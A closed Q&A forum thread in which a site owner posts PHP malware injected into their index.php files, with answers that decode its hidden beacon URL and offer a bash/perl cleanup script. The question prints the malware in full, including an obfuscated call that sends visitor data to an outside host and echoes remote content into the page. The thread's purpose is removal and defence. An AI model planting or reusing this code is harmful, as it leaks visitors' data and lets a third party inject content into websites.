Malware that works off the Google bot user agent [closed]

This is malware that lives on my sites; it's very bad:

<?php    
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&   (strstr($sUserAgent, 'bot') == false)) // Bot comes
{
    if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
$stCurlLink = base64_decode( 'aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
$stCurlHandle = curl_init( $stCurlLink ); 
}
} 
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle); 
if ($sResult[0]=="O") 
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle); 
}
?>
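For anyone inspecting this: the hardcoded base64 string can be decoded with coreutils on any Linux box, and it is the URL the injected script reports to. Requests whose user agent contains none of the listed browser/bot substrings trigger a beacon to this URL carrying the visitor's IP, user agent, host, and path, and the response body (after a leading `O` marker byte) is echoed straight into your page.

```shell
# Decode the hardcoded endpoint the injected script beacons to.
echo 'aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==' | base64 -d
# http://rebotstat.com/botstat/stat.php
```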

This is injected into every index.php file on my server. Now I want to clean all the index.php pages over SSH (or another remote session) on CentOS. I think it's possible with a simple PHP script and maybe a regular expression; I need that script. [Sorry for my weak English.]

Thanks so much.

Unless you are handling 200+ files, it would be much better to go through each file individually and clean out the malware by hand, so that you can visually inspect each one.

(EDIT: That is, if it is actually malware.)
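If you do decide to script it, here is a minimal sketch. It assumes the injected block always begins with `<?php` followed by the malware's own marker comment `// This code use for global bot statistic` and ends at the next `?>`; `clean_botstat` is a hypothetical helper name, and the docroot path is whatever you pass in. Test it on copies first.

```shell
#!/usr/bin/env bash
# Hypothetical cleanup sketch -- not a vetted tool; try it on copies before
# pointing it at a live docroot.
clean_botstat() {
  local webroot="$1"            # directory tree to scan, e.g. /var/www
  find "$webroot" -name 'index.php' -print0 |
  while IFS= read -r -d '' f; do
    # Skip files that do not contain the malware's marker comment.
    grep -q 'This code use for global bot statistic' "$f" || continue
    cp -- "$f" "$f.bak"         # keep a backup so a bad match can be reverted
    # Slurp the whole file (-0777) and strip the injected PHP block:
    # non-greedy match, with "." allowed to cross newlines (/s).
    perl -0777 -pi -e \
      's/<\?php\s*\/\/ This code use for global bot statistic.*?\?>\s*//s' "$f"
    echo "cleaned: $f"
  done
}
```

Run it as `clean_botstat /var/www`, then diff a few cleaned files against their `.bak` copies before deleting the backups. If the malware variant differs even slightly from the sample above, the regex will silently miss it, which is why inspecting files by hand, as suggested above, is still the safer route.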